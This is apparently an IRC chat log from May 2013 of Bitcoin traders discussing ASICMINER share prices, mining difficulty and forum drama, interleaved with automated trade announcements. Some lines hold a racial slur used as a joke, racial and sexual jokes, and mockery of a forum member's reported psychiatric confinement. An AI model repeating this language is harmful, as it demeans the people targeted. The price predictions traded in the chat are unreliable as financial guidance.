;;tslb May 17 00:04:14 ;;bc,stats May 17 00:04:16 Time since last block: 38 minutes and 33 seconds May 17 00:04:19 Current Blocks: 236501 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1386 blocks | Next Difficulty In About: 1 week, 2 days, 7 hours, 14 minutes, and 53 seconds | Next Difficulty Estimate: 12088604.5602 | Estimated Percent Change: 8.05691 May 17 00:04:30 ;;nethash May 17 00:04:30 84042.4848453 May 17 00:04:34 it dropped ?! May 17 00:04:49 it was too new May 17 00:04:54 to be accurate May 17 00:04:56 before May 17 00:05:03 ;;estimate May 17 00:05:04 Next difficulty estimate | 12088604.5602 based on data since last change | 11740420.3571 based on data for last three days May 17 00:05:16 or May 17 00:05:18 it dropped May 17 00:05:20 :/ May 17 00:05:25 any prediction for difficulty for July 17? May 17 00:05:43 likely AM will be mining at 250TH by then May 17 00:05:57 likely Avalon batch 2 will have shpped as well May 17 00:06:14 also possible some avalon chips will be in use May 17 00:06:28 my prediction: quite high May 17 00:06:32 Hello May 17 00:06:51 oh May 17 00:07:02 i almost forgot BitFury May 17 00:07:08 masters of the universe May 17 00:07:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0172 = 0.0344 BTC [+] May 17 00:08:23 ThickAsThieves: would you buy iDiff-O July shares at 0.18? May 17 00:08:46 hmm May 17 00:08:53 i'd need to run the numbers May 17 00:08:55 but possibly May 17 00:09:15 what date May 17 00:09:20 July 17 May 17 00:10:13 so 5 or 6 diff changes May 17 00:10:46 yeah May 17 00:10:51 i'd probly buy May 17 00:11:16 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [-] May 17 00:11:58 ok, there won't be many at that price, i'll let know when i'm done May 17 00:12:06 i'm tied up May 17 00:12:11 atm May 17 00:12:45 would need 4-12hrs May 17 00:18:06 [HAVELOCK] [VTX] 27 @ 0.4449 = 12.0123 BTC [+] May 17 00:22:10 [MPEX] [S.MPOE] 4321 @ 0.00066975 = 2.894 BTC [-] May 17 00:22:12 [MPEX] [S.MPOE] 9379 @ 0.00067001 = 6.284 BTC [+] May 17 00:27:05 [HAVELOCK] [VTX] 2 @ 0.445 = 0.89 BTC [+] May 17 00:30:07 [HAVELOCK] [ASICM] 20 @ 0.01849 = 0.3698 BTC [-] May 17 00:31:34 [BTCTC] [ASICMINER-PT] 1 @ 1.774999 BTC [+] May 17 00:34:06 [HAVELOCK] [ASICM] 312 @ 0.0181 = 5.6472 BTC [-] May 17 00:34:07 [HAVELOCK] [ASICM] 19 @ 0.018 = 0.342 BTC [-] May 17 00:34:08 [HAVELOCK] [ASICM] 169 @ 0.0177 = 2.9913 BTC [-] May 17 00:37:12 Would like to bulk buy a bit of SatoshiDice shares if anyone is selling at a discount. May 17 00:38:21 lol they are already selling at a discount May 17 00:39:17 and what about G.MPOE? i'm slowly taking over the passthrough just by virtue of having sole bid at 0.00055 :D May 17 00:39:26 [BTCTC] [ASICMINER-PT] 5 @ 1.774999 = 8.875 BTC [+] May 17 00:40:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.0172 = 0.0688 BTC [+] May 17 00:41:34 https://bitfunder.com/asset/CoinBr.iDiff-O July is open. All cheaper shares than 0.195 were bought out by TAT. May 17 00:42:05 [HAVELOCK] [ASICM] 1 @ 0.0181 BTC [+] **** BEGIN LOGGING AT Fri May 17 12:41:35 2013 May 17 12:46:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.01775 = 0.3728 BTC [+] May 17 12:53:12 [BTCTC] [TAT.ASICMINER] 65 @ 0.01773 = 1.1525 BTC [-] May 17 12:55:16 [BTCTC] [S.DICE-PT] 4 @ 0.002577 = 0.0103 BTC [+] May 17 12:59:44 [BTCTC] [S.BBET-PT] 25 @ 0.019 = 0.475 BTC [+] May 17 13:03:42 [BTCTC] [TAT.ASICMINER] 17 @ 0.01773 = 0.3014 BTC [-] May 17 13:04:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.01775 = 0.0888 BTC [+] May 17 13:07:57 [BTCTC] [MININGCO.ETF] 2 @ 0.73 = 1.46 BTC [-] May 17 13:08:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.01775 BTC [+] May 17 13:08:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.01775 = 0.0888 BTC [+] May 17 13:16:16 [BTCTC] [TAT.ASICMINER] 83 @ 0.01775 = 1.4733 BTC [+] May 17 13:20:21 [BTCTC] [ASICMINER-PT] 2 @ 1.81 = 3.62 BTC [+] May 17 13:20:42 [BTCTC] [TAT.ASICMINER] 18 @ 0.0178 = 0.3204 BTC [+] May 17 13:22:41 [BTCTC] [TAT.ASICMINER] 70 @ 0.0179 = 1.253 BTC [+] May 17 13:22:44 [BTCTC] [TAT.ASICMINER] 70 @ 0.01795 = 1.2565 BTC [+] May 17 13:27:34 [BTCTC] [TAT.ASICMINER] 27 @ 0.01795 = 0.4847 BTC [+] May 17 13:43:48 [BTCTC] [TAT.ASICMINER] 13 @ 0.01795 = 0.2334 BTC [+] May 17 13:46:03 [HAVELOCK] [ASICM] 552 @ 0.0181 = 9.9912 BTC [+] May 17 13:46:21 https://bitcointalk.org/index.php?topic=186043.0;all May 17 13:46:24 that thread is so much win May 17 13:47:31 we shouldn't do racist jokes May 17 13:47:35 racism is a crime May 17 13:47:39 and crime is for niggers May 17 13:47:49 lol May 17 13:48:02 [HAVELOCK] [ASICM] 374 @ 0.0181 = 6.7694 BTC [+] May 17 13:48:24 [BTCTC] [GSDPT] 5 @ 0.00253 = 0.0127 BTC [-] May 17 13:48:36 [BTCTC] [GSDPT] 1 @ 0.00252 BTC [-] May 17 13:50:05 haha May 17 13:50:08 is that chapelle ? May 17 13:50:17 https://bitcointalk.org/index.php?topic=173433.msg2178901#msg2178901 May 17 13:50:22 pietila is back! May 17 13:50:28 yes May 17 13:50:46 did you see his post about being in the insane lock up or whatever? May 17 13:51:05 he had a meltdown it seems May 17 13:51:16 his rontus guy, seems as crazy as he is... May 17 13:52:33 pretty lol honestly now. May 17 13:52:39 paypal never had this quality of trolling. May 17 13:52:45 and believe it or not, trolling is culture. May 17 13:53:18 dumb people don't know how to troll May 17 13:53:28 im very aware trolling is a fine art May 17 13:53:34 and moreover, take any bit of preserved literacy, what is it ? May 17 13:53:43 anything voltaire ever wrote, is it not trolling ? May 17 13:54:00 the very bitcoin project is trolling banks and haters since day 1 May 17 13:54:20 Eine logisch-mathematische Untersuchung uber den Begriff der Zahl , what is that ? May 17 13:54:23 is it not trolling ? May 17 13:54:25 i trolled theymos, got banned for it, was good times May 17 13:54:48 swift's modest proposal, trolling through and through. May 17 13:55:01 but honestly im not sure reptillia is trolling, i think he might really be crazy May 17 13:55:26 dullusions of self grandure, if he is trolling he gets 10/10 May 17 13:55:48 it's spelled delusions you know May 17 13:55:57 and grandeur May 17 13:56:18 i dont bother with speelling "correctly" May 17 13:56:32 im happy if you understand my ideas :) May 17 13:58:25 Update May 17 13:58:26 The mass production of Block Erupter USB is to be done today. May 17 13:58:27 00t May 17 13:58:57 10,000 usb stick at hmm... 2 btc each... not bad not bad at all May 17 14:01:38 http://merlinsmagicbitcoins.com/ lol wtf? May 17 14:03:06 ya totally. May 17 14:08:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.01795 BTC [+] May 17 14:16:55 Yeah, I can't wait to rush in. I get a seat at a round table! Weeee! May 17 14:17:25 o hallo May 17 14:18:23 As for safety, I do not know any official classification of this place, but my gut feeling is that in order for anyone (which means, anyone) to take me out of here alive, it requires an operation that cannot be planned in secret, and the lead time is minimum 48 hours. If dead, it can be achieved relatively quickly, but there will be considerable (100,000+) collateral damage if the success needs to be achieved at a greater than 75% probability. May 17 14:18:48 reptilia needs some kind of serius recognition for this May 17 14:19:10 jurov he got it didn't he May 17 14:19:21 "Bitcoin's master troll to date" May 17 14:19:30 yes, sth like that May 17 14:20:41 course it'd be important to discern if the safety is designated or actual. May 17 14:20:55 OMFGLBBQ: My experiences tell that even the patients here are eager to buy by the truckload, as soon as they get into the position to do so. May 17 14:21:59 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [+] May 17 14:22:03 [HAVELOCK] [ASICM] 178 @ 0.0181 = 3.2218 BTC [+] May 17 14:22:10 not sure how reptillia can be a supernode he is going to try and bull a satoshi May 17 14:22:40 [BTCTC] [ASICMINER-PT] 2 @ 1.82 = 3.64 BTC [+] May 17 14:22:51 1.82 nice May 17 14:23:26 [BTCTC] [ASICMINER-PT] 1 @ 1.83 BTC [+] May 17 14:23:41 [BTCTC] [ASICMINER-PT] 1 @ 1.83 BTC [+] May 17 14:23:45 an attack on 120? May 17 14:24:07 sorry for spamming I really cannot even: I sent only a 2-ppl detachment to the Bay area, but they are my Ambassadors and have full authority to spend as many bitcoins as deemed necessary to subdue all, as well as I myself am subdued under the authority of Finnish government right now. May 17 14:24:54 i wonder if he got jailed cuz he did not pay the hotel, then went crazy May 17 14:25:37 Bay Area Surrenders to Risto de Silver I. May 17 14:26:48 jurov o may gawd May 17 14:26:56 [BTCTC] [TAT.ASICMINER] 19 @ 0.01795 = 0.3411 BTC [+] May 17 14:26:56 https://bitcointalk.org/index.php?topic=206948.0;topicseen man, this looks like a scam waiting to happen May 17 14:27:38 Chaang-Noi it's all over the scam forum already May 17 14:28:00 oh May 17 14:28:15 ihad him on ignore for a month now cuz i thought he was a scammer May 17 14:28:26 ripple is perfect for scammers, shocked this was not done sooner May 17 14:29:11 i don't think he's a scammer, he seems like a kid with mostly good ideas ocasionally getting ahead of himself. May 17 14:29:30 You mean tradefortress? May 17 14:29:34 furuknap yeah May 17 14:29:40 he wanted to do a trade with me with out escrow, red flags went up, just m gut reaction May 17 14:29:55 jurov if tortilla actually comes to timisoara do you want early warning to show up ? May 17 14:30:12 yes pls May 17 14:30:20 why would he go? May 17 14:30:24 it will cost you 1337 megabictoinz May 17 14:30:36 Chaang-Noi because he has correctly identified me as the most important entity in btc ? May 17 14:30:50 lol May 17 14:31:00 he trolled you into thinking that? May 17 14:31:17 ahh that was too good to pass on May 17 14:31:28 np, i'll pay in s.mpoe microshares May 17 14:31:59 [BTCTC] [TAT.ASICMINER] 80 @ 0.01798 = 1.4384 BTC [+] May 17 14:32:13 reptillia wants to be a supper node, but he just be crazy... May 17 14:32:14 micro AM shares are the real currency du jour May 17 14:32:15 [BTCTC] [TAT.ASICMINER] 16 @ 0.01798 = 0.2877 BTC [+] May 17 14:32:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.01799 = 0.036 BTC [+] May 17 14:32:40 [BTCTC] [TAT.ASICMINER] 67 @ 0.01799 = 1.2053 BTC [+] May 17 14:33:09 friggin price is bubbling too fast... May 17 14:33:12 [BTCTC] [TAT.ASICMINER] 100 @ 0.018 = 1.8 BTC [+] May 17 14:33:13 Chaang-Noi you're just butthurt that he's not ivisting indochina or w/e unhard of bumfuck May 17 14:33:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.018 = 0.36 BTC [+] May 17 14:33:30 [BTCTC] [TAT.ASICMINER] 46 @ 0.01807 = 0.8312 BTC [+] May 17 14:33:38 ThickAsThieves that's why they're no good as currency. smpoe is bubbling slow. May 17 14:33:39 investing indo china? May 17 14:33:48 voseting! May 17 14:33:55 i that we don't care about spoaling May 17 14:33:59 [BTCTC] [TAT.ASICMINER] 200 @ 0.01807 = 3.614 BTC [+] May 17 14:34:01 even my only investment is in china, and that is asic miner May 17 14:34:39 asic miner seems to be kicking ass, so make fun of asia all you want, you and super node have fun making out :) May 17 14:34:53 see ? you're bubblebutthurt May 17 14:34:57 ;;asks 120 May 17 14:35:01 There are currently 4776.8374 bitcoins offered at or under 120.0 USD, worth 573088.28631 USD in total. | Data vintage: 0.0038 seconds May 17 14:35:14 yes i am so jelly of you and supernode being bbf May 17 14:36:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.01807 = 0.0361 BTC [+] May 17 14:36:54 http://polimedia.us/dtng/c/src/136878931844.jpg May 17 14:37:25 turkey? May 17 14:37:40 ya May 17 14:38:18 always nice to see the muslium star and cresent at the white house... May 17 14:38:54 s.dice is starting to ban us ip addresses, true or fud? May 17 14:39:37 land of the free May 17 14:39:40 fo May 17 14:40:11 so the only thing eric does in a year of development is ban 1/2 its users, hmm May 17 14:40:24 from the website May 17 14:40:48 americans don't belong on the internet anyway May 17 14:41:02 [HAVELOCK] [SDICE] 1 @ 0.187 BTC [-] May 17 14:41:20 like i repeated like 10 times now, some investor large enough to give a fuck about it will simply clone the website and make it available in the US without erik being able to do jack shit about it May 17 14:41:46 there are clones already May 17 14:42:01 of SD or of its website? May 17 14:43:24 Uglux he means that it's trivial to make 500 s.dice websites May 17 14:43:29 as unauthorised copies. May 17 14:43:39 ie, the banning is toothless. May 17 14:43:56 mircea_popescu: yup, wasn't sure if he meant cloning the concept or its website May 17 14:43:56 maybe so May 17 14:44:06 but the banning is certainly not progress May 17 14:44:13 depends in what perspective. May 17 14:44:16 so basically no one cares, zero fucks given May 17 14:44:25 it removes possibly the largest argument the us could have brought. May 17 14:44:26 ThickAsThieves: it is a nice marketing stunt May 17 14:44:28 in that, it is progress. May 17 14:45:34 marketing ploy, progress, or one more nail in the coffin, whichever it is, I'm over it for now :) May 17 14:45:38 [BTCTC] [S.BBET-PT] 1 @ 0.019 BTC [+] May 17 14:45:53 " To say that a young woman has a vagina or that she has sexual intercourse is an affront to her modesty that is not tolerated. The correct and expected reference is to her cunt and to fucking." May 17 14:46:02 this in nigeria apparently May 17 14:46:14 because english was the language of the upper class white people, and so it is respectable May 17 14:53:51 [MPEX] [S.MPOE] 1050 @ 0.00066737 = 0.7007 BTC [-] May 17 14:53:53 [MPEX] [S.MPOE] 3700 @ 0.00066687 = 2.4674 BTC [-] May 17 14:54:04 The meeting with the doctor ended in a mutual agreement that I am too manic to continue posting on this forum. May 17 14:54:17 his newest post... https://bitcointalk.org/index.php?topic=174620.msg2179552#msg2179552 May 17 14:54:20 yay rpietella May 17 14:54:43 if he "eats his medicine" he won't be able to see bitcoin visions anymore May 17 14:56:09 lol May 17 14:56:24 i wonder if there's going to be a forum ambassador nao May 17 14:57:09 rontus already posted i the thread May 17 14:57:27 is it the same guy ? May 17 14:57:42 i think its his main assistant May 17 14:58:03 [HAVELOCK] [ASICM] 317 @ 0.01810998 = 5.7409 BTC [+] May 17 14:58:07 https://bitcointalk.org/index.php?action=profile;u=16424 May 17 14:58:21 Date Registered: May 31, 2011, 06:28:02 AM May 17 14:58:27 dude gtfo, this is something awful. May 17 14:58:37 "I am one of the hosts for this summit." May 17 14:58:54 i guess i will have to yield my sa trolling competition. May 17 14:59:13 they certainly did a lot better than any of teh bitcoin ppl on their own forum. May 17 14:59:21 " May 17 14:59:21 I met Risto for the first time last autumn in some Bitcoin related stuff." May 17 14:59:49 yaya May 17 14:59:53 if this guy is AS and reptillia too, mad props, sending 93k usd as part of a trolling operation is epic shit May 17 15:00:31 they got the bitcoin neh ? May 17 15:00:39 no big deal, i'm sure people wanting to buy btc can be found. May 17 15:00:45 and this worked otc. May 17 15:01:15 sure but really, if this was just a troll buying 700 btc is pretty into it May 17 15:01:20 10/10 for sure May 17 15:01:33 ya but i guess if the goons got together May 17 15:01:43 they might have been able to find someone who wanted to buy 100k worth of btc and didn't know how. May 17 15:01:53 but yes, certainly epic shit. May 17 15:01:55 yeah it can be done, sure. im just impressed, but i still dont think he is a troll, just a nutter May 17 15:02:14 a nutter who shockingly got locked up May 17 15:02:14 [BTCTC] [ASICMINER-PT] 5 @ 1.84 = 9.2 BTC [+] May 17 15:02:15 i am inclined to think it's goonery by now. May 17 15:02:36 Chaang-Noi he said so, we don't know he actually has. May 17 15:02:39 After reading a bit now, I vote for nutter too. May 17 15:02:48 how many nutters actually admit to being locked up ? May 17 15:02:51 maybe 1 in 100 May 17 15:03:05 [BTCTC] [ASICMINER-PT] 5 @ 1.8495 = 9.2475 BTC [+] May 17 15:03:31 when it's just mild schizophrenias I think it's easy to know you are messed up May 17 15:03:38 "Shit, if a tall and beautiful woman shows up at a Bitcoin conference we're all doomed anyway. " May 17 15:03:43 yeah, i understand, im not 100% sure but id say 70% he is just a crazy May 17 15:03:44 lmao all these noobs. May 17 15:03:50 mpoe-pr is like 5foot9 May 17 15:04:02 [HAVELOCK] [ASICM] 216 @ 0.01849 = 3.9938 BTC [+] May 17 15:04:12 5 foot 9 is tall for there? May 17 15:04:30 ?! May 17 15:05:15 short? May 17 15:05:17 fairly common in the US May 17 15:05:26 Thailand 167.5 cm (5' 5.9") 157.3 cm (5' 1.9") May 17 15:05:32 what the fuck you on about goatboy May 17 15:05:49 i know asians are shorter, i live here May 17 15:06:08 so then what "for there" ? May 17 15:06:16 Sweden 180 cm (5' 10.9") 166.9 cm (5' 5.7") May 17 15:06:27 apparently 5foot 9 is tall for sweden May 17 15:06:45 if you cout all the other races, she is white right? May 17 15:06:55 anyway, i gota go for a bit, peace May 17 15:07:04 sweden is white... May 17 15:07:59 once you go black... May 17 15:08:31 must suck to be black and with a normal penis these days May 17 15:08:45 so disappointing May 17 15:12:17 [BTCTC] [COGNITIVE] 1 @ 0.220001 BTC [-] May 17 15:12:22 [BTCTC] [COGNITIVE] 1 @ 0.22 BTC [-] May 17 15:12:26 [BTCTC] [COGNITIVE] 1 @ 0.211 BTC [-] May 17 15:12:52 [BTCTC] [COGNITIVE] 2 @ 0.21001 = 0.42 BTC [-] May 17 15:12:54 [MPEX] [S.MPOE] 6300 @ 0.00066937 = 4.217 BTC [+] May 17 15:12:57 [BTCTC] [COGNITIVE] 4 @ 0.210001 = 0.84 BTC [-] May 17 15:13:15 [BTCTC] [COGNITIVE] 10 @ 0.21 = 2.1 BTC [-] May 17 15:16:23 cognitive sell off, hmm May 17 15:16:54 what's cognitive again ? May 17 15:17:03 rpietilla post two more if anyone cares May 17 15:17:23 cognitive is a smallish mining operations with mostly gpus and some fpgas May 17 15:17:35 they have invested into bfl and are going to invest in avalon May 17 15:17:43 i ahve some as a hedge against AM May 17 15:17:57 i hold 5% of the company and got in at an average prioce of .11 so im pretty happy May 17 15:18:02 However I will still be able to breathe inside the house, plus drink and eat reasonably well. So my lifestyle, which was originally fit for a king, is still fit for a travelling salesman. May 17 15:18:04 it's pretty good. May 17 15:18:23 Chaang-Noi well i dunno if 5btc counts as a selloff if they have an actual business then. May 17 15:18:50 yeah its just the most action downward i have seen from them in a while May 17 15:19:13 they do have a real business, and ahve been around a long time, but they are not exactly racking in the btc at this point May 17 15:19:48 "Annina Rusila, Personal Secretary. Annina is helping Roni to achieve the mission. She is travelling single. For the reason that she is in close cooperation with Roni, though, she is not allowed to smoke during the conference (except if/when Roni sends her to solitary mission)." May 17 15:19:49 i think it is over valued, its only to protect myself from a sudden bfl shipping, however it is looking less and less likely that that will happen any time soon May 17 15:20:25 solitary msision ?! May 17 15:20:36 "annina go jack off" ? May 17 15:20:40 when that guy worked with me about the wire he was very professional and seemed sane May 17 15:21:57 "1.5 class Bitcoin Supernode," May 17 15:22:07 fuck, i forget his rankings... i wonder what i am... May 17 15:22:27 [BTCTC] [ASICMINER-PT] 4 @ 1.85 = 7.4 BTC [+] May 17 15:23:18 1.85, nice May 17 15:28:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.01807 = 1.807 BTC [+] May 17 15:31:40 [HAVELOCK] [ASICM] 15 @ 0.01848 = 0.2772 BTC [-] May 17 15:32:08 http://i.imgur.com/JiYOga7.jpg May 17 15:32:09 lol May 17 15:32:31 old buy good May 17 15:32:35 but May 17 15:32:47 i am new to the world of supernodes May 17 15:32:56 ahh May 17 15:33:01 mp is a supernode May 17 15:33:15 rename this channel to bitcoin-supernode May 17 15:33:28 we should! May 17 15:36:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.01807 = 0.1626 BTC [+] May 17 15:36:28 http://www.npr.org/blogs/alltechconsidered/2013/05/15/184223110/new-rifle-on-sale May 17 15:36:30 want has May 17 15:36:33 [BTCTC] [ASICMINER-PT] 6 @ 1.85 = 11.1 BTC [+] May 17 15:36:35 [BTCTC] [TAT.ASICMINER] 150 @ 0.01807 = 2.7105 BTC [+] May 17 15:36:55 [BTCTC] [ASICMINER-PT] 2 @ 1.85 = 3.7 BTC [+] May 17 15:37:34 22k damn May 17 15:37:35 [HAVELOCK] [ASICM] 1 @ 0.01848 BTC [-] May 17 15:42:08 [BTCTC] [ASICMINER-PT] 2 @ 1.85 = 3.7 BTC [+] May 17 15:42:33 That rifle really just needs to know _who_ to shoot, and it would be perfect. May 17 15:45:46 :) May 17 15:46:37 1.85. People are nuts. May 17 15:46:54 it is under valued :) May 17 15:47:01 I agree May 17 15:47:01 but May 17 15:47:02 Can't be. May 17 15:47:06 I do wish it would slow down a lil May 17 15:48:44 It's priced now as to not stand a chance in 2016. That'll kill a lot of dreams... May 17 15:49:16 There must be a serious correction or a lot of people are going to be very angry at the cat. May 17 15:49:58 [BTCTC] [ASICMINER-PT] 1 @ 1.859 BTC [+] May 17 15:50:17 furuknap May 17 15:50:25 Yes, dear? May 17 15:50:31 you assert your opinions and guesses like they are facts May 17 15:50:38 this will bite you in the ass May 17 15:50:46 It's just math. May 17 15:50:50 and stop you from having persective May 17 15:50:55 perspective May 17 15:50:56 no May 17 15:51:04 math is just one piece May 17 15:51:31 share value is much more than ROI May 17 15:51:47 No, it's the entire basis of myu perspective. I realize that suckers will follow the herd, but that's really not how I want to do business. May 17 15:52:06 your logic would require nearly all investors to be suckers May 17 15:52:16 in all markets May 17 15:52:38 it would also make you a sucker May 17 15:52:38 No, it wouldn't, and that kind of argument isn't really effective. There's a major difference of evaluating risk and not standing a chance in hell. May 17 15:53:15 Right now, we're rapidly trending towards negative ROI if friedcat achieves everything he says. That's not a chance in hell. May 17 15:53:47 I can understand people being passionate, I just don't want to pay ฿1 for ฿0.5. May 17 15:53:51 I'm not going to debate you too hard on all this, I have been watching your posts and made my own opinions about your predispositions May 17 15:53:59 you are your own worst enemy May 17 15:54:07 and self-righteous without warrant May 17 15:54:19 [BTCTC] [ASICMINER-PT] 4 @ 1.859 = 7.436 BTC [+] May 17 15:54:23 http://imgur.com/i7kB7EO freshly mined innocent coins will be worth a lot soon(tm) May 17 15:54:26 Like I said, I based my opinions on math, nothing more. May 17 15:54:32 I recommend hardcore perspective May 17 15:54:56 Actually, I would favor in the direction of risk, but right now, there isn't risk, it's suicide. May 17 15:55:02 ask yourself "okay, i have made my analysis, now how could I make myself totally wrong" May 17 15:55:14 then weigh both sides May 17 15:55:18 I've been doing that, three ways over. May 17 15:55:26 yet you sold too soon May 17 15:55:48 No, I sold at 1.78 including options. I had secured that at around 1.50. May 17 15:56:27 how many shares? May 17 15:56:44 [BTCTC] [TAT.ASICMINER] 55 @ 0.01807 = 0.9939 BTC [+] May 17 15:56:47 That's roughly 5% from current top. I have no problems missing the top bu as much as 30-40% even, especially when I see there are no fundamentals supporting the price above that. May 17 15:56:59 this isnt the top May 17 15:57:02 30 or so shares? I don't remember exactly. May 17 15:57:31 so so far you have lost $250 plus next week's dividends May 17 15:57:36 [BTCTC] [ASICMINER-PT] 3 @ 1.86 = 5.58 BTC [+] May 17 15:57:42 Yes, and I' May 17 15:57:47 bah May 17 15:58:02 Yes, and I've also gained far more. You're not going to sucker me into that trap :-) May 17 15:58:18 i don't have any desire to sucker you into anything May 17 15:58:21 Nobody ever lost from walking away with a profit. May 17 15:58:28 LOL May 17 15:58:48 pirate maybe :P May 17 15:58:58 [BTCTC] [ASICMINER-PT] 3 @ 1.86 = 5.58 BTC [+] May 17 15:59:07 I've doubled my money in a month and not taken any risk. I'm perfectly capable of living with not getting the last few drops of the can. May 17 15:59:53 you assume it won't sit at 2.2 for 4 weeks May 17 16:00:13 or that share value won't erode slower than div payout May 17 16:00:34 No, I'm assuming there's no support for a price above 1.50ish even at twice the rate that friedcat predicts. May 17 16:00:49 it appears there is May 17 16:01:02 [MPEX] [S.BBET] 500 @ 0.00159999 = 0.8 BTC [+] May 17 16:01:04 That's where that darn math comes in again and says you're wrong. May 17 16:01:14 my math says you're wrong May 17 16:01:15 so there May 17 16:01:18 :P May 17 16:01:26 Heh, I wish it were that simple :-) May 17 16:01:29 it is May 17 16:01:34 $250 so far May 17 16:01:37 pretty simple May 17 16:01:40 Yeah. And what type of math do you use? The pink one? May 17 16:02:35 [BTCTC] [TAT.ASICMINER] 26 @ 0.01839 = 0.4781 BTC [+] May 17 16:02:48 I use that furry math May 17 16:02:57 Oohh.. Furries are nice. May 17 16:03:11 Sadly, they mostly exist in fantasy. May 17 16:03:57 [BTCTC] [TAT.ASICMINER] 80 @ 0.018396 = 1.4717 BTC [+] May 17 16:04:56 [BTCTC] [TAT.ASICMINER] 77 @ 0.018397 = 1.4166 BTC [+] May 17 16:04:56 I realize people buy on far more than ROI. I don't. Even if the price goes up to 2.5, it will still be within what I'm perfectly comfortable 'loosing' by just taking 1.10 per share (and even a bit more since I got a few of the waves right). May 17 16:05:02 Sneak peak for ya'll. I'm sponsoring SMiguel's charts to live at http://www.asicminercharts.com/ May 17 16:05:09 haha cool May 17 16:05:12 he hasn't announced yet May 17 16:05:27 Nice, TAT. May 17 16:05:40 how's the data acquired ? May 17 16:05:56 not sure May 17 16:06:05 >.> May 17 16:06:06 That's actually one thing that the BTC community lacks. Sponsoring of useful information. Clark Moody is fine, but all the ad services are crap. May 17 16:06:07 probly a mix May 17 16:06:08 what are you sponsoring ? May 17 16:06:14 his work May 17 16:06:27 furuknap been sayin' it since 2012. May 17 16:06:30 AM community has been enjoying it May 17 16:06:35 and no one is tipping him May 17 16:06:39 ThickAsThieves ye know what i mean. gotta know what it is. May 17 16:06:59 I don't May 17 16:07:05 you mean what did I pay? May 17 16:07:14 http://trilema.com/2013/some-basic-discussion-of-charity/ the long version May 17 16:07:24 the short version : don't sponsor things you don;'t understand, they may blow up in your face. May 17 16:07:27 I seem to be out of credits May 17 16:07:31 which doesnt make sense May 17 16:07:37 had at least 1000 May 17 16:07:44 mp, I'm mostly recognized in the SharePoint community where there are two community players that run highly successful ad servics for bloggers and services. I've reached out to one of them who is also a sponsor for my next book and asked whether she'd be willing to look at a similar service for BTC community. May 17 16:07:46 ThickAsThieves prolly cookie expired ? May 17 16:07:58 furuknap that'd be great May 17 16:08:31 how do i fix my cookie? May 17 16:08:33 Advice for aspiring professionals in SharePoint. May 17 16:08:36 but anyway May 17 16:08:38 ThickAsThieves re-make it May 17 16:08:41 I'll fix your cookie ThickAsThieves May 17 16:08:51 I'll look up that email from you later May 17 16:08:59 Yeah, that sort of puts you out of the audience of the book :-) May 17 16:09:11 SharePoint is a business app platform from Microsoft. May 17 16:09:12 furuknap i didn't even know there's a sharepoint community May 17 16:09:16 the old ms office thing ? May 17 16:09:37 the guy has been supplying this chart, noted no tips, so I thought hmm, I'll back him up a little and see where it goes May 17 16:09:39 Not really old, it came out with the latest version in February. May 17 16:09:41 it's not charity May 17 16:09:46 I get alink out of it May 17 16:10:14 he gets motivation to keep doing and developing it fiurther May 17 16:10:20 don't go all defensive on me, i'm not saying it's bad May 17 16:10:24 This one is free. It's part of a test I'm running to see if I can get a better way of providing information to people. My other 20ish books cost around $20 each. May 17 16:10:30 i'm just saying you gotta know the basic idea, where he gets the data, stuff like that. May 17 16:10:32 oh i didnt mean to sound dfensive May 17 16:10:36 just being quick May 17 16:10:47 furuknap which books be those ? May 17 16:10:47 I am. May 17 16:11:17 I will ask him to post about how he pulls the data though May 17 16:11:22 You can hang on for a couple of days and the next one is out free. I'd be happy to send you other copies though. May 17 16:11:24 would be interesting May 17 16:11:34 http://uspjournal.com/ <- Most of my books. Others on Amazon. May 17 16:11:39 here is a derivative http://deepfriedcat.com/ May 17 16:11:52 Couple of days as in most likley Monday. May 17 16:12:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.018397 = 0.2392 BTC [+] May 17 16:12:49 [BTCTC] [TAT.ASICMINER] 57 @ 0.0184 = 1.0488 BTC [+] May 17 16:13:27 furuknap so basically they're all on sharepoint ? May 17 16:14:02 Yup, at least the ones that are available. I've done a couple of private ones too. All IT, though. May 17 16:14:18 anyway, i was thinking fo some stuff early 2000s May 17 16:14:21 not sure if this is related. May 17 16:14:58 truffles: I can't please everyone :-) May 17 16:15:53 mp: What stuff is that? May 17 16:16:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0184 BTC [+] May 17 16:16:38 windows sharepoint was some old, pretty much abandoned stuff ms came out with in i think 2002 May 17 16:16:52 i think they merged half of it into frontpage May 17 16:16:57 2001, but OK, I'll bite. May 17 16:16:59 is that the one that was basically Outlook on a stick? May 17 16:17:04 a okay. May 17 16:17:21 ThickAsThieves i can't for the life of me recall exactly wehat it was May 17 16:17:31 i think it's server-based Outlook May 17 16:17:39 eail for biz and stuff May 17 16:17:41 email* May 17 16:18:00 Yeah, the early stuff was pretty bad and distributed in two versions. One free was an extension of SharePoint and a server verson which was nothing of the sorts. May 17 16:18:10 No, it has nothing to do with Outlook. May 17 16:18:43 so what's this new thing, microsoft cloud basically ? May 17 16:18:50 Think of it as a web base database with tons of services and user configuration and db design. It's an accident waitning to happen (and has happened) but it's widely adopted now. May 17 16:19:05 sure looks a lot like Outlook May 17 16:19:27 like if Outlook wanted to be Salesforce or something May 17 16:19:30 Yeah, but you also thinks the math looks like it support a price above 1.8. May 17 16:19:34 :-P May 17 16:19:39 lmao the new guy has teeth May 17 16:19:45 lol May 17 16:19:58 new guy floats on his own hot air May 17 16:20:17 SharePoint is more like Notes if you have to compare it to something. May 17 16:20:43 anyway, sorta back on topic : bitcoin finance desperately needs analysts, of the real kind May 17 16:20:59 I agree. It will come. May 17 16:21:00 anyone starting a blog now on the topic and sticking to it professionally will be the gigaom/whatever of bitcoin in a decade. May 17 16:21:03 [HAVELOCK] [ASICM] 